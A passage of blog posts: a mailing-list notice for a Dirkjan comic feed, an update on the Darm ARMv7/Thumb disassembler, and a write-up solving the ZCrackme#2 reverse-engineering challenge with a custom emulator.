so much a mailing list, as it’s mostly one-way traffic, but it’s a fun way to
keep up-to-date with two Dirkjans a week!

Subscribe

Having said that, one can subscribe here simply by filling out
the email address. Other information is optional and not very interesting.
(Yes, the website is a bit ugly - it’s the default mailing list manager.)

By subscribing you agree to being awesome (given you’re interested in reading
Dirkjan) and the legal disclaimer on the bottom of this blogpost.

Subscription

As I’ve only just set up the mailing list, I do not know exactly when new
comics will arrive, but it looks like it will be every Tuesday. Please, when
subscribed
, do not panic - the comics will come eventually! (Just
wait!)

Legal stuff

I’m not affiliated with Veronica in any way. Any damage done through this
Dirkjan Email Feed is at your own responsibility. I do not intend
to damage Veronica in any way.

That’s all, and have fun reading Dirkjan. Dirkjan is awesome :)

Darm Update - More ARMv7, More Thumb

Darm Updates - More ARMv7, More Thumb

Darm is an ARMv7 disassembler in C. This blogpost is just
a small update about the new stuff in darm from over the past couple of
months, as there were some delays due to conferences and other stuff :)

Thumb support

Most notably, recently Darm has gained support for the Thumb instruction
set. Those of you familiar with ARMv7 know ARMv7 has two modes, namely, ARMv7
and Thumb. ARMv7 contains pretty much all the instructions you’d ever need,
but Thumb is a small subset of the most used ARMv7 instructions and are only
16 bits in size, whereas ARMv7 instructions are 32 bits in size. Needless to
say, Thumb allows for more compact code.

The API to disassemble Thumb instructions is as straightforward as the
equivalent function for disassembling ARMv7 instructions. Furthermore, the two
instruction set modes share the same data structure, darm_t, hence it is
easily possible to write generic analysis routines without having to worry
whether you’re analyzing ARMv7 or Thumb.

Currently, the C API looks roughly like the following. (Including the Thumb2
function, for more information on that, read further.)

typedef struct _darm_t {
    [...]
} darm_t;
// disassemble an armv7 instruction
int darm_armv7_disasm(darm_t *d, uint32_t w);
// disassemble a thumb instruction
int darm_thumb_disasm(darm_t *d, uint16_t w);
// disassemble a thumb2 instruction
int darm_thumb2_disasm(darm_t *d, uint16_t w, uint16_t w2);
    

ARMv7 Improvements and Bug Fixes

ARMv7 has mostly had some bug fixes and a couple of new instructions. Nothing
too spectacular, but it’s still improving as I find bugs and stumble upon new
instructions.

Coming up: Thumb2 support

Currently I’m working on getting support for the Thumb2 instruction set as
well. As the Thumb instruction set is fairly limited with regards to the
instruction that it can handle, as it’s only 16 bits in size, rather than 32
bits, there’s also the Thumb2 extension. Thumb2 features almost all (except
for maybe a handful of instructions) of the instructions which are also
available in the ARMv7 instruction set, hence allowing the optimized Thumb
instructions to be mixed with Thumb2 instructions, which are, as ARMv7, 32
bits in size.

Having said that, if there are requests for instructions which you’d like to
see sooner rather than later, please do contact me. At first I aim to support,
let’s say, 90% of the binaries while keeping the amount of implemented
instructions to a “minimum.” That is, I’ll focus on the most used Thumb2
instructions at first, and go for the complete instruction set later.

Difference between ARMv7 and Thumb/Thumb2

A small explanation on ARMv7 vs Thumb/Thumb2.

When executing ARM instructions, the instruction will be executed as ARMv7
instruction whenever the address is 4-byte aligned, and executed as either
Thumb or Thumb2 instruction, depending on its encoding, when the lowest
significant bit is set. That is, when the address is not 4-byte aligned, but
instead either addr+1 or addr+3 (with addr being a 4-byte aligned pointer),
then the instruction is decoded as being either Thumb or Thumb2.

The instruction is either decoded as Thumb or Thumb2 depending on a couple of
the most significant bits. When decoded as Thumb, one 16 bit word is fetched
and executed. When decoded as Thumb2, a second 16 bit word is fetched and the
instruction is decoded as if it were a 32 bit word.

At the following lines of code we can see the comparison of the
upper 5 bits of the first 16 bit word. When the upper five bits equal either
b11101 (binary 11101, or 29 in decimal), b11110, or b11111, then it is a
Thumb2 instruction. Otherwise it’s a Thumb instruction.

Also note that at the moment there are two seperate functions to disassemble
Thumb and Thumb2 instructions, but don’t worry, in the future there’ll be a
nice wrapper around them :)

Contact

For questions etc, you know where to find me.

Solving ZCrackme#2: A Custom Emulator Approach

Solving ZCrackme#2: A Custom Emulator Approach

Due to my non-existent experience with using gdb under ARMv7, I decided to
solve this challenge (the ZCrackme #2 Challenge) using a minimal
ARMv7 emulator
based on my ARMv7 disassembler. (The original
challenge can be found here.)

ZCrackme#2 Challenge

The binary itself is fairly interesting. It has a similar structure as the
first ZCrackme challenge (not sure if there’s a blogpost about this one
though.) Basically the ELF header is messed up, sections are missing, and the
Entry Point points to a page filled with zeroes.

INIT_ARRAY

Upon further inspection, using readelf -a zcrackme2, we find that the binary
features the so-called preinit-array, init-array, and fini-array dynamic
sections. These dynamic sections in fact represent a table of function
addresses which are being called right before calling the real Entry
Point (in the case of preinit-array and init-array) and called after
calling the real Entry Point (in the case of fini-array.)

Looking up the various virtual offsets using IDA Pro, we find that only the
init-array points to a real address, loc_B0D8. (The other table arrays,
preinit-array and fini-array, are filled with zeroes and -1′s, which are
nops - as in, these are not really called.)

We conclude that the actual entry point, or, the code that will be executed
first, is located at this (loc_B0D8) address. From analyzing this routine
in IDA Pro, we see
some sort of decryption loop which overwrites some memory. Finally, after
executing said decryption loop, an interesting system call is performed,
namely #0xf0002. We find that this system call represents
__clear_cache.

__clear_cache

Basically, before the decrypted code can be executed, the code cache first has
to be cleared for the particular address range in order to make sure that,
when it is being executed, the new code will be executed, rather than any
remaining code in the cache.

Similar tricks to this (decrypting code and clearing the cache) are performed
a total of five times in this crackme.

So, having cleared the cache, the execution flow of the crackme now ends up in
the decrypted code. Which, in turn, does some more rounds of decryption.

Code Decryption

As mentioned, the crackme overwrites memory of the ELF file a total of five
times. One of these “decryptions” in fact zeroes the first 100 bytes of the
ELF header. As our goal is to dump a decrypted version of the crackme binary,
this ELF header corruption does not help us (as IDA Pro wouldn’t understand
the binary anymore.)

Reconstructing a Decrypted Binary

As decryption is being followed by clearing the cache each time, we dump a new
binary during each time the cache is cleared. We do this by applying the
changes to a copy of the original binary. That is, read the decrypted data
from emulator memory, and overwriting it to our original binaries buffer. We
do this for each decryption, except for the one iteration where the ELF header
is zeroed out. (Note: the __clear_cache system call takes the starting
address as first parameter and the end address as second parameter, hence it
is trivial for us to find out which chunks of memory have been decrypted.)

Scripting the Emulator

The following script, although a bit messy, represents the code to dump
the binary a couple of times, which results in the final binary we’re
interested in. The unpacked binary can be found here. (Note that this
unpacked binary may be inaccurate, with regards to global variables etc that
have been updated during runtime but are not reflected in this version of the
binary.)

Having successfully dumped the unpacked binary, it is now time for some static
analysis on this binary. Do note that our emulator should run fine on
Windows and Linux (with a 32bit Python installed, that is.)

The actual Crackme

Looking through the dumped binary, we find ourselves looking at sub_87B4,
which is the function where the real stuff is happening (argc/argv parsing,
that is.)

There are a couple of odd text messages which will be printed whenever
incorrect information is entered on the commandline. Finally, we find some
interesting function calls, of which one to sub_8638, which seems to decrypt
the string buffer that can be found at byte_9C35, and another function which
does a custom strcmp() against the argument on the commandline.

The string at byte_9C35 is decrypted by xor’ing with 0x0d (decrypted to a
buffer on the stack by sub_8638), resulting in the
string ZenCracking. That said, we’ve solved the challenge..

Conclusion

In case somebody has a working gdb for ARMv7 setup, this challenge is probably
pretty easy (i.e., step through the various decryption iterations, and try to
find the custom strcmp.) However, I had fun implementing the simple ARMv7
emulator, which is in fact pretty tricky, with all the conditional stuff going
on.

Now a harder crackme? Let’s hope the next one does not involve xor
“encryption” :p Zimperium’s response was, however, that having gotten to the
xor-decryption part already shows enough knowledge and understanding of ARMv7,
to which I agree :)